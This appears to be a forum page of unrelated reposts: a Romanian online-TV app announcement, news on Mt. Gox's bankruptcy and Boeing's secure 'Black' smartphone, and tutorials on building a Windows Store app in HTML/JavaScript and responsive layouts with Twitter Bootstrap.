Leaderboard

Am creat acest topic pentru ca nu vreau sa ma amestec in topicurile celorlalti, asa ca am sa postez doar in acest topic tot ce este nou in aplicatie. Prima varianta de TV online: Download: IRCGate.ro - Portal romanesc - Downloads Astazi am reusit sa termin versiunea a doua cu urmatoarele modificari: - fiecare categorie are acum mai multe canale - unele posturi au si server 1 sau server 2 - autoplay la fiecare alegere de film - informatii canal TV: adresa url, adresa sop, si fiecare canal are autoplay(cu activ sau inactiv; insa majoritatea au activ) Download: IRCGate.ro - Portal romanesc - Downloads Pentru a rula aplicatia este nevoie sa aveti instalat: NET Framework 4,5 si sopcast.

Mt. Gox is officially filing for bankruptcy protection with an outstanding debt of ¥6.5bn ($63.6m), finally admitting openly that 750,000 of its customers’ bitcoins and 100,000 of the company’s own have been lost. The exchange’s lawyer announced the news during a conference at the Tokyo District Court late on Friday afternoon, Japan time. CEO Mark Karpeles, wearing a suit and tie, bowed deeply in the tradition of disgraced Japanese business leaders fronting the media. Karpelesbows2Subtitles read: “The 750,000 bitcoins we kept for users, (37,000 million yen), almost all gone.” The 850,000 BTC loss figure is higher than the 744,400 figure mentioned in the so-called “Crisis Strategy Draft” document leaked and released by Ryan Galt, aka The Two-Bit Idiot, earlier in the week. That same document also described fiat assets of $32.43m and liabilities of $55m. The assets include $5m “held by CoinLab” and another $5.5m “held by the DHS”. The Department of Homeland Security seized that amount from Mt. Gox’s US accounts in mid 2013, claiming it had not registered properly as a money transmission business. Nightmare week It’s been a nightmare week for Mt. Gox and its customers, with much of the situation’s true nature still mired in online speculation, rumor and conspiracy theories. The exact fate of all Mt. Gox customers’ bitcoins is still unclear: how such an amount came to be lost or stolen without anyone knowing or taking action, whether ‘transaction malleability’ was indeed behind it, or whether they were transferred to other addresses or lost to the bitcoin network altogether. CEO Karpeles resigned his position on the Bitcoin Foundation Board just four days ago, beginning a chain of events that culminated in today’s press event. Shortly after that, Mt. Gox’s entire Twitter history disappeared, the ‘crisis’ documents were leaked, and then the website went completely offline, taking with it most customer hopes of ever seeing their money again. The domain mtgox.com now features only a blank page with the Mt. Gox logo and two short statements, one of which reads “In light of recent news reports and the potential repercussions on MtGox’s operations and the market, a decision was taken to close all transactions for the time being in order to protect the site and our users. We will be closely monitoring the situation and will react accordingly.” The most recent, from 26th February, reassures everyone that Karpeles is still in Japan and “working very hard with the support of different parties to find a solution to our recent issues.” While no regulatory action is guaranteed in Japan, federal prosecutors in New York City have subpoenaed Mt. Gox and requested that it preserve documents that may be relevant. Protest ends, customers lament Kolin Burges, who triggered media interest around the world with his protest outside Mt. Gox’s office and confrontation with Karpeles nearly two weeks ago, took the opportunity to back up his signs and head back to London. Most customers have now resigned themselves to losing hundreds of thousands or even millions of dollars, including those who claim to have lost business startup capital, college funds or even entire life savings in the crash. Burges himself claimed to have lost around $300,000 in bitcoins. Source: Mt. Gox Files for Bankruptcy, Claims $63.6m Debt

Looking for a*Secure Smartphone? World's biggest Aerospace company - Boeing is finally close to the launch of its high-security Android Smartphone, called "Boeing Black (H8V-BLK1)",*primarily designed for secure communication between Governmental agencies and their contractors. Encrypted email, Secure Instant Messaging and Other privacy services and tools are booming in the wake of the National Security Agency’s recently revealed surveillance programs. Encryption isn’t meant to keep hackers out, but when it’s designed and implemented correctly, it alters the way messages look. Boeing is the company which is already providing secure communications for US Government officials, including the president. Don't mess with it, It can**Self-Destruct:*Boeing Black*Smartphone can Self-Destruct*if it is tampered with, destroying all the data on it. The device is delivered in complete sealed form, any attempt to open the seal of the device will destruct the operating system and functionality of the device. “Any attempt to break open the casing of the device would trigger functions that would delete the data and software contained within the device and make the device inoperable,” says the paperwork. Well, another important fact to be noticed,*Boeing Black (H8V-BLK1) won't be available to average consumers, it is designed for Governmental agencies, Defense and Homeland security only. Ultra-Secure Mobile Operating System:*Boeing's modified Android operating system has a specific software security policy configuration, so users can configure the device for maximum mission productivity and security. "Boeing Black’s security is powered by the Boeing PureSecure architecture, which was designed from the outset for the mobile environment. Our architectural foundation is built upon layers of trust from embedded hardware, operating system policy controls, and compatibility with leading mobile device management systems. The device’s hardware roots of trust and trusted boot ensure the device starts in a trusted state, enabling the maximum security of data. Hardware media encryption and configurable inhibit controls are embedded to protect the device, its data, and the transmission of information, significantly reducing the risk of mission compromise due to data loss." according to the paperwork they filed with the Federal Communication Commission (FCC). Boeing Black supports*dual MicroSIM with GSM, WCDMA, and LTE on a wide range of*bands to facilitate global*use and operates on the modified version of Android Operating, that keeps all details as secure as possible. Security and Confidentiality of the information of any person related to the National Security must be on the high priority, but problem arises when the NSA like agencies starts capturing the Data flowing on the backbone of the communication channel and Bribes Software companies to weaken the encryption, and that compels a user to think twice before opting the new inventions and products. At the Mobile World Congress in Barcelona,*Washington-based software firm Silent Circle and Madrid-based Geeksphone teamed up to launch the Blackphone, highly secure device that doesn't run on any traditional telecom carriers or operating systems. We have reported earlier, there is another interesting*Self-destructing Chips project, that has been handed over to IBM by the Defense*Advance Research Projects Agency (DARPA). Sursa: Boeing launches Ultra-Secure 'Black' Smartphone that has Self-Destruct Feature - The Hacker News

One of the advantages for developing Windows Store apps is that you can utilize your existing knowledge of HTML, CSS and Javascript. This tutorial teaches you how to create a simple “Hello, world” Windows Store app built for Windows using JavaScript. In this tutorial, you learn how to: Create a new project Add HTML content to your start page Handle touch, pen, and mouse input Switch between the light and dark style sheets Create your own custom styles Use a Windows Library for JavaScript control We show you how to create a Windows Store app using HTML, JavaScript, and CSS. Note that you can also create Windows Store apps using other technologies. To write a Windows Store app using C# and Visual Basic, or C++ and XAML. For graphics-intensive apps, you can use DirectX and C++. Getting Started To complete this tutorial, you need Windows 8 and Microsoft Visual Studio Express 2012 for Windows 8. To download them, see Get the tools. You also need a developer license. For instructions, see Get a developer license. Step 1: Create a new project in Visual Studio Let’s create a new app named HelloWorld. Here’s how: 1. Launch Visual Studio Express 2012 for Windows 8. The Visual Studio Express 2012 for Windows 8 start screen appears. 2. From the File menu select New Project. The New Project dialog appears. The left pane of the dialog lets you pick the type of templates to display. 3. In the left pane, expand Installed, then expand Templates, then expand JavaScript and select the Windows Store template type. The dialog’s center pane displays a list of project templates for JavaScript. For this tutorial, we use the Blank App template. This template creates a minimal Windows Store app that compiles and runs, but contains no user interface controls or data. We’ll add controls and data to the app over the course of these tutorials. 4. In the center pane, select the Blank App template. 5. In the Name text box, enter “HelloWorld”. 6. Uncheck the Create directory for solution checkbox. 7. Click OK to create the project. Visual Studio creates your project and displays it in the Solution Explorer. Although the Blank App is a minimal template, it still contains a handful of files: * A manifest file (package.appxmanifest) that describes your app (its name, description, tile, start page, splash screen, and so on) and lists the files that your app contains. A set of large and small logo images (logo.png and smalllogo.png)to display in the start screen. An image (storelogo.png) to represent your app in the Windows Store. A splash screen (splashscreen.png) to show when your app starts. CSS and code files for the Windows Library for JavaScript (inside the References folder). A start page (default.html) and an accompanying JavaScript file (default.js) that run when your app starts. These files are essential to all Windows Store apps using JavaScript. Any project that you create in Visual Studio contains them. Step 2: Launch the app At this point, we created a very simple app. If you want to see what it looks like, press F5 to build, deploy, and start your app. A default splash screen appears first. The splash screen is defined by an image (splashscreen.png) and a background color (specified in our app’s manifest file). We don’t cover it here, but it’s easy to customize your splash screen. (To find out how, see Adding a splash screen.) The splash screen disappears, and then our app appears. It contains a black screen with the text “Content goes here”. There is no button or command to close the app. To close the app, slide from the top edge toward the bottom edge of the screen or press Alt-F4. Go to the Start screen; notice that deploying the app adds its tile to the last group on the Start screen. To run the app again, tap or click its tile on the start screen or press F5 in Visual Studio to run the app in the debugger. It doesn’t do much—yet—but congratulations, you’ve built your first Windows Store app! Step 3: Modify your start page One of the files that Visual Studio created for us is default.html, our app’s start page. When the app runs, it displays the content of its start page. The start page also contains references to the app’s code files and style sheets. Here’s the start page that Visual Studio created for us: <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title>HelloWorld</title> <!-- WinJS references --> <link href="//Microsoft.WinJS.1.0/css/ui-dark.css" rel="stylesheet" /> <script src="//Microsoft.WinJS.1.0/js/base.js"></script> <script src="//Microsoft.WinJS.1.0/js/ui.js"></script> <!-- HelloWorld references --> <link href="/css/default.css" rel="stylesheet" /> <script src="/js/default.js"></script> </head> <body> <p>Content goes here</p> </body> </html> Let’s add some new content to your default.html file. Just as you would add content to any other HTML file, you add your content inside the body element. You can use HTML5 elements to create your app (with a few exceptions). That means you can use HTML5 elements like h1, p, button, div, and img. To modify our start page 1. Replace the existing content in the body element with a first-level heading that says “Hello, world!”, some text that asks the user’s name, an input element to accept the user’s name, a button, and a div element. Assign IDs to the input, the button, and the div . <body> <h1>Hello, world!</h1> <p>What's your name?</p> <input id="nameInput" type="text" /> <button id="helloButton">Say "Hello"</button> <div id="greetingOutput"></div> </body> 2. Run the app. Right now, clicking the button doesn’t do anything. In the next steps, we create an event handler for the button that displays a personalized greeting. We add our event handler code to our default.js file. Step 4: Create an event handler When we created our new project, Visual Studio created a /js/default.js file for us. This file contains code for handling your app’s lifecycle, a concept that we explain in Part 2: Manage app lifecycle and state. It’s also where you write additional code that provides interactivity for your default.html file. Open the default.js file. Before we start adding our own code, let’s take a look at the first and last few lines of code in the file: (function () { "use strict"; // Omitted code })(); You might be wondering what’s going on here. These lines of code wrap the rest of the default.js code in a self-executing anonymous function. Now that you know what it does, you’re probably wondering why we wrap our code in a self-executing anonymous function. It’s because this makes it easier to avoid naming conflicts or situations where you accidently modify a value that you didn’t intend to. It also keeps unnecessary identifiers out of the global namespace, which helps performance. It looks a little strange, but it’s a good programming practice. The next line of code turns on strict mode for your JavaScript code. Strict mode provides additional error checking for your code. For example, it prevents you from using implicitly declared variables or assigning a value to a read-only property. Take a look at the rest of the code in default.js. It handles your app’s activated and checkpoint events. We go into more detail about these events later. For now, just know that the activated event fires when your app starts. Let’s define an event handler for your button. Our new event handler gets the user’s name from the nameInput input control and uses it to output a greeting to the greetingOutput div element that you created in the last section. Using events that work for touch, mouse, and pen input With Windows 8, you don’t need to worry about the differences between touch, mouse, and other forms of pointer input. You can just use events that you know, like click, and they work for all forms of input. Tip Your app can also use the new MSPointer* and MSGesture* events, which work for touch, mouse, and pen input and can provide additional info about the device that triggered the event. For more info, see Responding to user interaction and Gestures, manipulations, and interactions. Let’s go ahead and create the event handler. To create the event handler 1. In default.js, after the app.oncheckpoint event handler and before the call to app.start, create a click event handler function named buttonClickHandler that takes a single parameter named eventInfo. 2. Inside our event handler, retrieve the user’s name from the nameInput input control and use it to create a greeting. Use the greetingOutput div to display the result. function buttonClickHandler(eventInfo) { var userName = document.getElementById("nameInput").value; var greetingString = "Hello, " + userName + "!"; document.getElementById("greetingOutput").innerText = greetingString; } We added our event handler to default.js. Now we need to register it. Step 5: Register the event handler when our app launches The only thing we need to do now is register the event handler with the button. The recommended way to register an event handler is to call addEventListener from our code. A good place to register the event handler is when our app is activated. Fortunately, Visual Studio generated some code for us in our default.js file that handles our app’s activation: the app.onactivated event handler. Let’s take a look at this code. WinJS.Binding.optimizeBindingReferences = true; var app = WinJS.Application; var activation = Windows.ApplicationModel.Activation; app.onactivated = function (args) { if (args.detail.kind === activation.ActivationKind.launch) { if (args.detail.previousExecutionState !== activation.ApplicationExecutionState.terminated) { // TODO: This application has been newly launched. Initialize // your application here. } else { // TODO: This application has been reactivated from suspension. // Restore application state here. } args.setPromise(WinJS.UI.processAll()); } }; Inside the onactivated handler, the code checks to see what type of activation occurred. There are many different types of activations. For example, your app is activated when the user launches your app and when the user wants to open a file that is associated with your app. (For more info, see Application lifecycle.) We’re interested in the launch activation. An app is launched whenever it is not running and then a user activates it. If the activation is a launch activation, the code checks to see how the app was shut down the last time in ran. Then it calls WinJS.UI.processAll. app.onactivated = function (args) { if (args.detail.kind === activation.ActivationKind.launch) { if (args.detail.previousExecutionState !== activation.ApplicationExecutionState.terminated) { // TODO: This application has been newly launched. Initialize // your application here. } else { // TODO: This application has been reactivated from suspension. // Restore application state here. } args.setPromise(WinJS.UI.processAll()); } }; It calls WinJS.UI.processAll regardless of whether the app had been shut down in the past or whether this is the very first time it’s being launched. The WinJS.UI.processAll is enclosed in a call to the setPromise method, which makes sure the splash screen isn’t taken down until the app’s page is ready. Tip The WinJS.UI.processAll function scans your default.html file for Windows Library for JavaScript controls and initializes them. So far, we haven’t added any of these controls, but it’s a good idea to leave this code in case you want to add them later. To learn more about Windows Library for JavaScript controls, see Quickstart: Adding WinJS controls and styles. A good place to register event handlers for non-Windows Library for JavaScript controls is just after the call to WinJS.UI.processAll. To register your event handler In the onactivated event handler in default.js, retrieve helloButton and use addEventListener to register our event handler for the click event. Add this code after the call to WinJS.UI.processAll. app.onactivated = function (args) { if (args.detail.kind === activation.ActivationKind.launch) { if (args.detail.previousExecutionState !== activation.ApplicationExecutionState.terminated) { // TODO: This application has been newly launched. Initialize // your application here. } else { // TODO: This application has been reactivated from suspension. // Restore application state here. } args.setPromise(WinJS.UI.processAll()); // Retrieve the button and register our event handler. var helloButton = document.getElementById("helloButton"); helloButton.addEventListener("click", buttonClickHandler, false); } }; Here’s the complete code for our updated default.js file: // For an introduction to the Blank template, see the following documentation: // JavaScript project templates for Windows Store apps (Windows) (function () { "use strict"; WinJS.Binding.optimizeBindingReferences = true; var app = WinJS.Application; var activation = Windows.ApplicationModel.Activation; app.onactivated = function (args) { if (args.detail.kind === activation.ActivationKind.launch) { if (args.detail.previousExecutionState !== activation.ApplicationExecutionState.terminated) { // TODO: This application has been newly launched. Initialize // your application here. } else { // TODO: This application has been reactivated from suspension. // Restore application state here. } args.setPromise(WinJS.UI.processAll()); // Retrieve the button and register our event handler. var helloButton = document.getElementById("helloButton"); helloButton.addEventListener("click", buttonClickHandler, false); } }; app.oncheckpoint = function (args) { // TODO: This application is about to be suspended. Save any state // that needs to persist across suspensions here. You might use the // WinJS.Application.sessionState object, which is automatically // saved and restored across suspension. If you need to complete an // asynchronous operation before your application is suspended, call // args.setPromise(). }; function buttonClickHandler(eventInfo) { var userName = document.getElementById("nameInput").value; var greetingString = "Hello, " + userName + "!"; document.getElementById("greetingOutput").innerText = greetingString; } app.start(); })(); Run the app. When you enter your name in the text box and click the button, the app displays a personalized greeting. Note If you’re curious as to why we use addEventListener to register our event in code rather than setting the onclick event in our HTML, see Coding basic apps for a detailed explanation. Step 6: Style our start page It’s easy to customize the look and feel of your app. Windows Store apps let you use Cascading Style Sheets, Level 3 (CSS3), much like you would for a website. The default.html that Visual Studio created for us contains a reference to the Windows Library for JavaScript style sheet: <!-- WinJS references --> <link href="//Microsoft.WinJS.1.0/css/ui-dark.css" rel="stylesheet" /> What does this style sheet do? Quite a bit! It provides these benefits: A set of styles that automatically give our app the Windows 8 look and feel. Just including the style sheet will make our controls look great and they’ll work with touch-based displays, too. Automatic support for high-contrast modes. These styles were designed with high-contrast in mind, so when our app runs on a device in high-contrast mode, it displays properly. Automatic support for other languages. The Windows Library for JavaScript style sheets automatically select the correct font for every language that Windows 8 supports. You can even use multiple languages in the same app and they are displayed properly. Automatic support for other reading orders. It automatically adjusts HTML and Windows Library for JavaScript controls, layouts, and styles for languages that read from right to left. By default, each HTML page in your project contains a reference to the dark style sheet. The Windows Library for JavaScript also provides a light style sheet. Let’s try it out and see what it looks like. To switch to the light style sheet 1. In your default.html file, replace the reference to the dark style sheet: <!-- WinJS references --> <link href="//Microsoft.WinJS.1.0/css/ui-dark.css" rel="stylesheet" /> With this one: <!-- WinJS references --> <link href="//Microsoft.WinJS.1.0/css/ui-light.css" rel="stylesheet" /> 2. Run your app. It now uses the light style sheet. Which style sheet should you use? Whichever one you want. For apps that mostly display images or video, we recommend using the dark style sheet, and for apps that contain a lot of text, we recommend using the light style sheet. (If you’re using a custom color scheme, use the style sheet that goes best with your app’s look and feel.) Creating your own styles If you want to customize the look and feel from your app, you don’t have to throw out the Windows Library for JavaScript styles and start over from scratch. It’s easy to make incremental changes by overriding the styles you want to change. In fact, it’s better to override the Windows Library for JavaScript styles rather than creating your own. When your app runs in high-contrast mode, any changes to the colors in the default styles are automatically overridden by a color scheme that supports high-contrast. You can override any style in the default style sheet by creating your own style sheet and including it after the Windows Library for JavaScript style sheet. The Blank App template does this for you. It creates a style sheet named default.css that you can use to create your own styles. <!-- WinJS references --> <link href="//Microsoft.WinJS.1.0/css/ui-light.css" rel="stylesheet" /> <script src="//Microsoft.WinJS.1.0/js/base.js"></script> <script src="//Microsoft.WinJS.1.0/js/ui.js"></script> <!-- HelloWorld references --> <link href="/css/default.css" rel="stylesheet" /> <script src="/js/default.js"></script> Let’s create some of our own styles. 1. First, lets add some div elements and classes to our HTML to make it easier to style. 1. In Visual Studio, open the default.html file. 2. Set your page header’s class attribute to “headerClass”. Create a div element and use it to contain your page’s main content. Give it a class setting of “mainContent”. <body> <h1 class="headerClass">Hello, world!</h1> <div class="mainContent"> <p>What's your name?</p> <input id="nameInput" type="text" /> <button id="helloButton">Say "Hello"</button> <div id="greetingOutput"></div> </div> </body> 2. Now lets define our styles. Open the default.css file. Let’s take a look at the file that Visual Studio generated for us: body { } @media screen and (-ms-view-state: fullscreen-landscape) { } @media screen and (-ms-view-state: filled) { } @media screen and (-ms-view-state: snapped) { } @media screen and (-ms-view-state: fullscreen-portrait) { } The generated file contains a few stubs for defining styles for different views. We’ll ignore these stubs for now (but we play with them in a later tutorial). 3. According to Layout out an app page, the heading has a top margin of 45 pixels and a left margin of 120 pixels. The content area also has a left margin of 120 pixels, a top margin of 31 pixels, and a bottom margin of 50 pixels. Define the headerClass and mainContent classes and set their margins to follow these guidelines. Also, create a style for the greetingOutput div that sets its height to 20 pixels and its bottom margin to 40 pixels. body { } .headerClass { margin-top: 45px; margin-left: 120px; } .mainContent { margin-top: 31px; margin-left: 120px; margin-bottom: 50px; } #greetingOutput { height: 20px; margin-bottom: 40px; } @media screen and (-ms-view-state: fullscreen-landscape) { } @media screen and (-ms-view-state: filled) { } @media screen and (-ms-view-state: snapped) { } @media screen and (-ms-view-state: fullscreen-portrait) { } Windows Store apps support CSS3, so there’s a lot you can do to customize your app. (For more info about styling your app, see Quickstart: Styling controls.) Step 7: Add a Windows Library for JavaScript control In addition to standard HTML controls, your Windows Store apps using JavaScript can use any of the new controls in the Windows Library for JavaScript, such as the WinJS.UI.DatePicker, WinJS.UI.FlipView, WinjS.UI.ListView, and WinJS.UI.Rating controls. Unlike HTML controls, Windows Library for JavaScript controls don’t have dedicated markup elements: you can’t create a Rating control by adding a element, for example. To add a Windows Library for JavaScript control, you create a div element and use the data-win-control attribute to specify the type of control you want. To add a Rating control, you set the attribute to “WinJS.UI.Rating”. Let’s add a Rating control to our app. 1. In your default.html file, add a label and a Rating control after the greetingOutput div. <body> <h1 class="headerClass">Hello, world!</h1> <div class="mainContent"> <p>What's your name?</p> <input id="nameInput" type="text" /> <button id="helloButton">Say "Hello"</button> <div id="greetingOutput"></div> <label for="ratingControlDiv"> Rate this greeting: </label> <div id="ratingControlDiv" data-win-control="WinJS.UI.Rating"> </div> </div> </body> For the Rating to load, your page must call WinJS.UI.processAll. Because our app is using one of the Visual Studio templates, our default.js already includes a call to WinJS.UI.processAll, as described earlier in Step 5, so you don’t have to add any code. 2. Run the app. Notice the new Rating control. Right now, clicking the Rating control changes the rating, but it doesn’t do anything else. Let’s use an event handler to do something when the user changes the rating. Step 8: Register an event handler for a Windows Library for JavaScript control Registering an event handler for a Windows Library for JavaScript control is a little different than registering an event handler for a standard HTML control. Earlier, we mentioned that the onactivated event handler calls WinJS.UI.processAll method to initialize Windows Library for JavaScript in your markup. The WinJS.UI.processAll is enclosed in a call to the setPromise method. args.setPromise(WinJS.UI.processAll()); If Rating were a standard HTML control, you could add your event handler after this call to WinJS.UI.processAll. But it’s a little more complicated for a Windows Library for JavaScript control like our Rating. Because WinJS.UI.processAll creates the Rating control for us, we can’t add the event handler to Rating until after WinJS.UI.processAll has finished its processing. If WinJS.UI.processAll were a typical method, we could register the Rating event handler right after we call it. But the WinJS.UI.processAll method is asynchronous, so any code that follows it might run before WinJS.UI.processAll completes. So, what do we do? We use a Promise object to receive notification when WinJS.UI.processAll completes. Like all asynchronous Windows Library for JavaScript methods, WinJS.UI.processAll returns a Promise object. A Promise is a “promise” that something will happen in the future; when that thing happens, the Promise is said to have completed. Promise objects have a then method that takes a “completed” function as a parameter. The Promise calls this function when it completes. By adding your code to a “completed” function and passing it to the Promise object’s then method, you can be sure your code executes after WinJS.UI.processAll is complete. 1. Let’s output the rating value when the user selects a rating. In your default.html file, create a div element to display the rating value and give it the id “ratingOutput”. <body> <h1 class="headerClass">Hello, world!</h1> <div class="mainContent"> <p>What's your name?</p> <input id="nameInput" type="text" /> <button id="helloButton">Say "Hello"</button> <div id="greetingOutput"></div> <label for="ratingControlDiv"> Rate this greeting: </label> <div id="ratingControlDiv" data-win-control="WinJS.UI.Rating"> </div> <div id="ratingOutput"></div> </div> </body> 2. In our default.js file, create an event handler for the Rating control’s change event named ratingChanged. The eventInfo parameter contains a detail.tentativeRating property that provides the new user rating. Retrieve this value and display it in the output div. function ratingChanged(eventInfo) { var ratingOutput = document.getElementById("ratingOutput"); ratingOutput.innerText = eventInfo.detail.tentativeRating; } 3. Update the code in our onactivated event handler that calls WinJS.UI.processAll by adding a call to the then method and passing it a completed function. In the completed function, retrieve the ratingControlDiv element that hosts the Rating control. Then use the winControl property to retrieve the actual Rating control. (This example defines the completed function inline.) args.setPromise(WinJS.UI.processAll().then(function completed() { // Retrieve the div that hosts the Rating control. var ratingControlDiv = document.getElementById("ratingControlDiv"); // Retrieve the actual Rating control. var ratingControl = ratingControlDiv.winControl; // Register the event handler. ratingControl.addEventListener("change", ratingChanged, false); })); 4. While it’s fine to register event handlers for HTML controls after the call to WinJS.UI.processAll, it’s also OK to register them inside your completed function. For simplicity, let’s go ahead and move all our event handler registrations inside the then event handler. Here’s our updated onactivated event handler: app.onactivated = function (args) { if (args.detail.kind === activation.ActivationKind.launch) { if (args.detail.previousExecutionState !== activation.ApplicationExecutionState.terminated) { // TODO: This application has been newly launched. Initialize // your application here. } else { // TODO: This application has been reactivated from suspension. // Restore application state here. } args.setPromise(WinJS.UI.processAll().then(function completed() { // Retrieve the div that hosts the Rating control. var ratingControlDiv = document.getElementById("ratingControlDiv"); // Retrieve the actual Rating control. var ratingControl = ratingControlDiv.winControl; // Register the event handler. ratingControl.addEventListener("change", ratingChanged, false); // Retrieve the button and register our event handler. var helloButton = document.getElementById("helloButton"); helloButton.addEventListener("click", buttonClickHandler, false); })); } }; 5. Run the app. When you select a rating value, it outputs the numeric value below the Rating control. Note This section and the last one just touched on what you need to know to start using Windows Library for JavaScript control. To learn more and to see a list of controls, see Quickstart: Adding WinJS controls and styles. Summary We’ve just seen how to add content to a Windows Store app, as well as how to add interactivity and how to style the app. This tutorial is brought to you by the team at MSDN. To learn more about coding for Windows Store apps, please visit Windows Store App development – Windows Dev Center See the complete code Did you get stuck, or do you want to check your work? If so, see complete code. How to Create a Windows Store app using HTML and JS | Web Resources | WebAppers

"Welcome to the responsive web!" In the last year or so this term has been thrown around everywhere, so often that even a lot of my clients are asking for a responsive design from the get go. This, to me, is really interesting because they never asked for a mobile or tablet version back in the day. One would argue that mobile wasn't so mainstream and everybody was trying to imitate the IOS interface on the web, and I agree, it was bad, but that's not the only reason why clients are asking for responsive!? Somehow they think we turn responsive design on or off as we please and that it's just normal to have, so the price should stay the same. Well, it's not that easy. How to use Twitter Bootstrap to Create a Responsive Website Design Responsive web design is an approach, I often call it a mindset, because you have to change the way you think when you're going responsive. The basic idea behind it is: one design to rule them all - no m.domain.com, no touch.domain.com, no 3 separate CSS files, no 7 PSD files for each device or each orientation - just “domain.com” looking the same on desktop, tablet and phone. The idea of responsive design relies on CSS3 media queries that target specific screen resolutions and sizes. Now media queries have been around for a while, but we used them to target print styles, mostly. With CSS3 they kind of evolved and became actually useful. Fun fact: today you can even write a media query for devices that weigh let's say 3KG. Crazy, right? Two things are sure if you’ll start creating responsive designs: More work - mostly more CSS code and often some JS but also lots of thinking and planning about the UI itself, how it scales, how users interact with it and so on. A whole lot of testing - this is the biggest downside. The only true way of testing responsive design is by actually using it on the devices themselves and you can imagine writing 5 lines of CSS then grabbing the iPad, loading the web, turning it landscape, oops it doesn't look so hot when in landscape, so back to code again...ugh and you get the point. Here comes the good part, there is an almost magical way to start creating responsive designs and it’s name is Twitter Bootstrap. Twitter Bootstrap - Your New BFF Twitter Bootstrap was created by two guys at Twitter who wanted to speed up and bootstrap their workload and code. If you visit the home page of Twitter Bootstrap they define it as: “sleek, intuitive, and powerful front-end framework for faster and easier web development.” and they are not lying to you! I’m usually not big on frameworks and like to code as much as possible myself for various reason so trust me on this one when I say it’s worth every minute you will spend learning it and that’s not going to be long. Twitter Bootstrap offers you a lot of amazing stuff out of the box: Global styles for the body to reset type and background, link styles, grid system, and two simple layouts. Styles for common HTML elements like typography, code, tables, forms, and buttons, and a great little icon set. Basic styles for common interface components like tabs and pills, navbar, alerts, page headers, and more. Javascript plugins for things like tooltips, popovers, modals, and more. But the most important part it's really easy to learn and use, plus it has a very good documentation and all the examples a developer could dream of. So let’s dig into it. Getting started with Bootstrap The first thing you want to do is visit the Bootstrap download page (it might be a good time to bookmark that URL as well). You can find the docs for everything there, including some basic guides and tutorials, so I won’t waste my time explaining that. This is important, you can download the framework from their homepage or you can download a customized version which I prefer more because you get to choose and select what you need or want. The best thing about this version is that it comes with just one CSS file with all the responsive media queries you need unlike the other version where you have one normal CSS file and a separate CSS file for media queries and a bunch of JS files which is just messy. So if you hop on to the Customize Bootstrap page, you’ll see that you can turn off/on things like JS plug-ins, CSS styles, UI components, responsive queries, define fonts, colors and so on. For this article you can just leave everything by default and click on the big “Download Customized Version” button. After you download and extract the package you will get the following: - bootstrap/ -- css/ --- bootstrap.css (safe to delete) --- bootstrap.min.css -- js/ --- bootstrap.js (safe to delete) --- bootstrap.min.js -- img/ --- glyphicons-halflings.png --- glyphicons-halflings-white.png First thing you can do is delete the non-minified versions of the CSS & JS files (bootstrap.css, bootstrap.js) because i don’t think you’ll be needing to fix or edit any of the bootstrap code but also the minified versions are a lot smaller and production ready. Next up it’s time to include them into your project. So let’s imagine we have a blank HTML file that goes something like this: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> title>No Boostrap in this project</title> </head> <body> <p>Hey, i wanna be responsive too </p> </body> </html> All you need to do to is reference the CSS file and JS file and you are bootstrapped. So for an example: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>With Bootstrap</title> <link rel="stylesheet" href="css/bootstrap.min.css"> </head> <body> <p>Hello Bootstrap!</p> <script src="//ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script> <script src="js/bootstrap.min.js"></script> </body> </html> Note: Now remember you don’t have to include any JS files for Bootstrap to function, you’ll get all the responsive features, grid and CSS styles just from the CSS file but for some parts of the framework like alerts, tabs and so on the JS files are needed. Also don’t forget to include jQuery if you’ll be using Bootstraps JS plugins. Note 2: I always put all my JS files at the bottom of my HTML because they don’t block page rendering and CSS loading time. This is something i do because I tend to follow the ySlow and Google PageSpeed rules for fast loading websites and page optimization. If you are new to this be sure to check the links above and read about it because this is something you should already be doing. OK now that we’ve included Bootstrap in our project we can start using all the magic that comes with it. Bootstrap Basics With Bootstrap you get a 12 column grid with two options: fluid - if you need your app to be 100% wide and use up all the width of the screen you should choose this option fixed - if you're creating a standard website you probably won't be needing all 100% of the screen so you chose the 940px option Note: If you go with a fixed layout remember this: by default Bootstrap has a media query for "large desktops" so if your screen is more than 1200px in resolution the 940px grid becomes 1170px wide. You can turn this off in the customization section I mentioned earlier and just have the 940px grid be the default one. I usually leave it in because things look a lot smaller if you have a 27" iMac. So let’s say we want to use the fixed layout to create 3 boxes on our homepage and we’d like them to float next to each other. If you were not using Bootstrap you’d have to write some CSS for you content container, each box, add floats, clear floats, padding, margins...ugh just see the magic of Bootstrap: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Getting started with Bootstrap</title> <link rel="stylesheet" href="http://flip.hr/css/bootstrap.min.css"> </head> <body> <div class="container"> <div class="hero-unit"> <h1>Awesome responsive layout</h1> <p>Hello guys i am a ".hero-unit" and you can use me if you wanna say something important.</p> <p><a class="btn btn-primary btn-large">Super important »</a></p> </div><!-- .hero-unit --> <div class="row"> <div class="span4"> <h2>Box Number 1</h2> <p>Donec id elit non mi porta gravida at eget metus. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Etiam porta sem malesuada magna mollis euismod. Donec sed odio dui. </p> <p><a class="btn" href="#">Click meeee »</a></p> </div><!-- .span4 --> <div class="span4"> <h2>Box Number 2</h2> <p>Donec id elit non mi porta gravida at eget metus. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Etiam porta sem malesuada magna mollis euismod. Donec sed odio dui. </p> <p><a class="btn" href="#">Click meeee »</a></p> </div><!-- .span4 --> <div class="span4"> <h2>Box Number 3</h2> <p>Donec id elit non mi porta gravida at eget metus. Fusce dapibus, tellus ac cursus commodo, tortor mauris condimentum nibh, ut fermentum massa justo sit amet risus. Etiam porta sem malesuada magna mollis euismod. Donec sed odio dui. </p> <p><a class="btn" href="#">Click meeee »</a></p> </div><!-- .span4 --> </div><!-- .row --> </div><!-- .container --> </body> </html> That’s it! We have 3 boxes with some nice default styling and as a bonus we added some content in front of the boxes to make it more sexy. Best part, everything is responsive, just try to resize your browser. (This is the point where you stare in the screen with a tear in your eye) Let’s break it down a bit: < div class="container" >< /div > - this one is a must have and it serves as a wrapper for all your page content. The most amazing thing is if you want to use a fluid layout just add container-fluid instead of container and that’s it. < div class="row" >< /div > - another must have for creating rows is a column wrapper that takes care of margins, padding and floating clears. Again if you are using a fluid layout just replace row with row-fluid and you're good 